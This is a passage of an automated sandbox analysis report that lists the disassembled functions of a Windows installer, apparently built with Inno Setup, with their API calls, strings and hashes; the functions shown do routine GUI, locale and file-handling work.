                                                                                                            • Instruction Fuzzy Hash: DE21E7707407047AE725BB798D47F9A76D89B08708F50407FB605EA1C3E9BD8C1486AE
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02132BD8,?,?,?,02132BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E31
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476E37
                                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02132BD8,?,?,?,02132BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E4A
                                                                                                            • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02132BD8,?,?,?,02132BD8), ref: 00476E74
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,02132BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E92
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                                            • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                                            • API String ID: 2704155762-2318956294
                                                                                                            • Opcode ID: 8cfa0abb3559021c6ef5ceae513d3fa85427733fdb4d87d7d1e91b32a0a746f4
                                                                                                            • Instruction ID: d2756be845a9a7cec8c09e5f4573334ab46b2fb936870a4cb364c11667d86bc7
                                                                                                            • Opcode Fuzzy Hash: 8cfa0abb3559021c6ef5ceae513d3fa85427733fdb4d87d7d1e91b32a0a746f4
                                                                                                            • Instruction Fuzzy Hash: E301D654340F0436EA30317A8C86FBB644E8B40769F158137BA1CEA2D2DAAC8D15127E
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(00000000,004596AE,?,00000000,00000000,00000000,?,00000006,?,00000000,00495CC7,?,00000000,00495D6A), ref: 004595F2
                                                                                                              • Part of subcall function 00453910: FindClose.KERNEL32(000000FF,00453A06), ref: 004539F5
                                                                                                            Strings
                                                                                                            • Failed to delete directory (%d). Will retry later., xrefs: 0045960B
                                                                                                            • Failed to strip read-only attribute., xrefs: 004595C0
                                                                                                            • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459667
                                                                                                            • Failed to delete directory (%d)., xrefs: 00459688
                                                                                                            • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 004595CC
                                                                                                            • Stripped read-only attribute., xrefs: 004595B4
                                                                                                            • Deleting directory: %s, xrefs: 0045957B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseErrorFindLast
                                                                                                            • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                                            • API String ID: 754982922-1448842058
                                                                                                            • Opcode ID: 57e0c8ccebeb7184da741e20b7d6bda7044560dbf179fd464141c630ba455fd8
                                                                                                            • Instruction ID: 65fff70db6fa7d9e45c4e30736062023b7b7828f3df3317cc7ecb80ce87614ba
                                                                                                            • Opcode Fuzzy Hash: 57e0c8ccebeb7184da741e20b7d6bda7044560dbf179fd464141c630ba455fd8
                                                                                                            • Instruction Fuzzy Hash: 7841A330A04209DBCB11DB6AC8013AE76A55F49306F55857FAC0197393DB7C8E0D876E
                                                                                                            APIs
                                                                                                            • GetCapture.USER32 ref: 00422EB4
                                                                                                            • GetCapture.USER32 ref: 00422EC3
                                                                                                            • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
                                                                                                            • ReleaseCapture.USER32 ref: 00422ECE
                                                                                                            • GetActiveWindow.USER32 ref: 00422EDD
                                                                                                            • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
                                                                                                            • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
                                                                                                            • GetActiveWindow.USER32 ref: 00422FCF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                            • String ID:
                                                                                                            • API String ID: 862346643-0
                                                                                                            • Opcode ID: 0c435bf511bce9c0c4602d4c311bc19cd41662654068aa8a958521a418b0f2a9
                                                                                                            • Instruction ID: db8aa600a50c93bece591f99e5806f4c3f5e9428d1b568cd9ed9aa9c7d903083
                                                                                                            • Opcode Fuzzy Hash: 0c435bf511bce9c0c4602d4c311bc19cd41662654068aa8a958521a418b0f2a9
                                                                                                            • Instruction Fuzzy Hash: 0A413F70B00254AFDB10EB6ADA42B9A77F1EF44304F5540BAF540AB392DB789E40DB5D
                                                                                                            APIs
                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0042F12E
                                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0042F145
                                                                                                            • GetActiveWindow.USER32 ref: 0042F14E
                                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F17B
                                                                                                            • SetActiveWindow.USER32(?,0042F2AB,00000000,?), ref: 0042F19C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ActiveLong$Message
                                                                                                            • String ID:
                                                                                                            • API String ID: 2785966331-0
                                                                                                            • Opcode ID: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
                                                                                                            • Instruction ID: 66ba457b2775015b13cc3341b2fd0efd1cc0de66d5492798f2afbbc1fd9aa33e
                                                                                                            • Opcode Fuzzy Hash: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
                                                                                                            • Instruction Fuzzy Hash: 7B31B474A00654EFDB01EFB6DC52D6EBBB8EB09714F9144BAF804E3291D6399D10CB68
                                                                                                            APIs
                                                                                                            • 73A1A570.USER32(00000000), ref: 0042949A
                                                                                                            • GetTextMetricsA.GDI32(00000000), ref: 004294A3
                                                                                                              • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004294B2
                                                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004294C6
                                                                                                            • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
                                                                                                            • GetSystemMetrics.USER32(00000006), ref: 004294F3
                                                                                                            • GetSystemMetrics.USER32(00000006), ref: 0042950D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                                                            • String ID:
                                                                                                            • API String ID: 361401722-0
                                                                                                            • Opcode ID: ddddefcdf100d818f5398c04065f48e60301a070589a14b18048d2092dd0edfb
                                                                                                            • Instruction ID: 4657f5dde1e086c017b18360b1712f1689f4efb7679c0f09225e2053bbf18421
                                                                                                            • Opcode Fuzzy Hash: ddddefcdf100d818f5398c04065f48e60301a070589a14b18048d2092dd0edfb
                                                                                                            • Instruction Fuzzy Hash: F701E1917087513BFB11B67A9CC2F6B61D8CB84358F44043FFA459A3D2D96C9C80866A
                                                                                                            APIs
                                                                                                            • 73A1A570.USER32(00000000,?,00419069,004970A2), ref: 0041DE37
                                                                                                            • 73A24620.GDI32(00000000,0000005A,00000000,?,00419069,004970A2), ref: 0041DE41
                                                                                                            • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004970A2), ref: 0041DE4E
                                                                                                            • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
                                                                                                            • GetStockObject.GDI32(00000007), ref: 0041DE6B
                                                                                                            • GetStockObject.GDI32(00000005), ref: 0041DE77
                                                                                                            • GetStockObject.GDI32(0000000D), ref: 0041DE83
                                                                                                            • LoadIconA.USER32(00000000,00007F00), ref: 0041DE94
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ObjectStock$A24620A480A570IconLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 3573811560-0
                                                                                                            • Opcode ID: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
                                                                                                            • Instruction ID: b4cf756beaef1adc4f5fbcf44fabff1cc3cb88bfcb9329de381bdc5a6adb432b
                                                                                                            • Opcode Fuzzy Hash: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
                                                                                                            • Instruction Fuzzy Hash: 88113DB06443015EE740FF665896BAA3690DB24708F04813FF645AF2D2DB7D1CA49BAE
                                                                                                            APIs
                                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00462A6C
                                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,00462B01), ref: 00462A72
                                                                                                            • SetCursor.USER32(?,00462AE9,00007F02,00000000,00462B01), ref: 00462ADC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Cursor$Load
                                                                                                            • String ID: $ $Internal error: Item already expanding
                                                                                                            • API String ID: 1675784387-1948079669
                                                                                                            • Opcode ID: ad683674f4580f1e1aa17f5a9c1d46edd0719ef7fbd07970485d4df48dda1b37
                                                                                                            • Instruction ID: 09c47418b275a9072aadbefc454c559749aab815838d7f365e24efc4a4a37fb5
                                                                                                            • Opcode Fuzzy Hash: ad683674f4580f1e1aa17f5a9c1d46edd0719ef7fbd07970485d4df48dda1b37
                                                                                                            • Instruction Fuzzy Hash: 0DB1A530600A04EFD720DF69D685B9ABBF1FF44304F1484AAE8459B7A2D7B8ED45CB19
                                                                                                            APIs
                                                                                                            • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00475755
                                                                                                            • 73A259E0.USER32(00000000,000000FC,004756B0,00000000,00475994,?,00000000,004759BE), ref: 0047577C
                                                                                                            • GetACP.KERNEL32(00000000,00475994,?,00000000,004759BE), ref: 004757B9
                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004757FF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: A259ClassInfoMessageSend
                                                                                                            • String ID: COMBOBOX$Inno Setup: Language
                                                                                                            • API String ID: 3217714596-4234151509
                                                                                                            • Opcode ID: 1ccc6747c3039ead22a329b7f78916889190244fc8c6905f913f87e2f769e72b
                                                                                                            • Instruction ID: 765adbbab907e06bc7bf6e6f7cf1d32fb8b56d6e7c29df1de031be62d4a3d325
                                                                                                            • Opcode Fuzzy Hash: 1ccc6747c3039ead22a329b7f78916889190244fc8c6905f913f87e2f769e72b
                                                                                                            • Instruction Fuzzy Hash: F7815E70A00605DFC710EF69D885A9EB7F5FB09314F1581BAE808EB362D774AD41CB99
                                                                                                            APIs
                                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742
                                                                                                              • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                                              • Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale$DefaultSystem
                                                                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                            • API String ID: 1044490935-665933166
                                                                                                            • Opcode ID: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
                                                                                                            • Instruction ID: 5b8a50df068a6b2da3a3ead13541c1976fd8fe610af15afaced6bb711b513b54
                                                                                                            • Opcode Fuzzy Hash: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
                                                                                                            • Instruction Fuzzy Hash: 35513024B00108ABD701FBA69D41A9E77A9DB94304F50C07FA441BB3C6DE3DDE15875E
                                                                                                            APIs
                                                                                                            • GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
                                                                                                            • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A
                                                                                                              • Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6
                                                                                                            • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6
                                                                                                              • Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0
                                                                                                            • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                                            • String ID: ,$?
                                                                                                            • API String ID: 2359071979-2308483597
                                                                                                            • Opcode ID: 57ccdcba8889ff27764a16026ea30ef1297fbdf3a800011468703812a277a737
                                                                                                            • Instruction ID: bc3149483dfa03cdc0807f0a56c3f90cc05caec19bb46b1e0c32919a2f580dbf
                                                                                                            • Opcode Fuzzy Hash: 57ccdcba8889ff27764a16026ea30ef1297fbdf3a800011468703812a277a737
                                                                                                            • Instruction Fuzzy Hash: 95512674A00144ABDB00EF6ADC816EA7BF9AF09304B11817BFA04E73A6D738C941CB5C
                                                                                                            APIs
                                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
                                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
                                                                                                            • GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
                                                                                                            • GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
                                                                                                            • DeleteObject.GDI32(?), ref: 0041BFAF
                                                                                                            • DeleteObject.GDI32(?), ref: 0041BFB8
                                                                                                            • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                                            • String ID:
                                                                                                            • API String ID: 1030595962-0
                                                                                                            • Opcode ID: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
                                                                                                            • Instruction ID: b628a60b6e344882d317dd96d191c0cb792f95d1e2fbfe9e34044ce63643746d
                                                                                                            • Opcode Fuzzy Hash: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
                                                                                                            • Instruction Fuzzy Hash: 48510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64
                                                                                                            APIs
                                                                                                            • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
                                                                                                            • 73A24620.GDI32(00000000,00000026), ref: 0041CF2D
                                                                                                            • 73A18830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
                                                                                                            • 73A122A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
                                                                                                            • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
                                                                                                            • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
                                                                                                            • 73A18830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Stretch$A18830$A122A24620BitsMode
                                                                                                            • String ID:
                                                                                                            • API String ID: 430401518-0
                                                                                                            • Opcode ID: d1728d26c473023a034cda29587c75d8a44e61feb8d5ac31eb3562e546440a0c
                                                                                                            • Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
                                                                                                            • Opcode Fuzzy Hash: d1728d26c473023a034cda29587c75d8a44e61feb8d5ac31eb3562e546440a0c
                                                                                                            • Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58
                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(00000000,?,?), ref: 00456526
                                                                                                              • Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC
                                                                                                              • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                                              • Part of subcall function 0041EEB4: 73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                                                              • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0045658D
                                                                                                            • TranslateMessage.USER32(?), ref: 004565AB
                                                                                                            • DispatchMessageA.USER32(?), ref: 004565B4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$TextWindow$A25940CurrentDispatchSendThreadTranslate
                                                                                                            • String ID: [Paused]
                                                                                                            • API String ID: 3047529653-4230553315
                                                                                                            • Opcode ID: dc734b73e23721f0060ca7094c6900a610c91b21ae2acdfdba29acc3faa202e8
                                                                                                            • Instruction ID: b21e1f9e90a9f2d36a55999f4aec8319d50e535270b7c0faa20aeab8e88a7384
                                                                                                            • Opcode Fuzzy Hash: dc734b73e23721f0060ca7094c6900a610c91b21ae2acdfdba29acc3faa202e8
                                                                                                            • Instruction Fuzzy Hash: 9B310B70904248AEDB01DBB5DC41BCE7BB8EB0D314F95407BF800E3296D67C9909CBA9
                                                                                                            APIs
                                                                                                            • GetCursor.USER32(00000000,0046A767), ref: 0046A6E4
                                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 0046A6F2
                                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046A767), ref: 0046A6F8
                                                                                                            • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046A767), ref: 0046A702
                                                                                                            • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046A767), ref: 0046A708
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
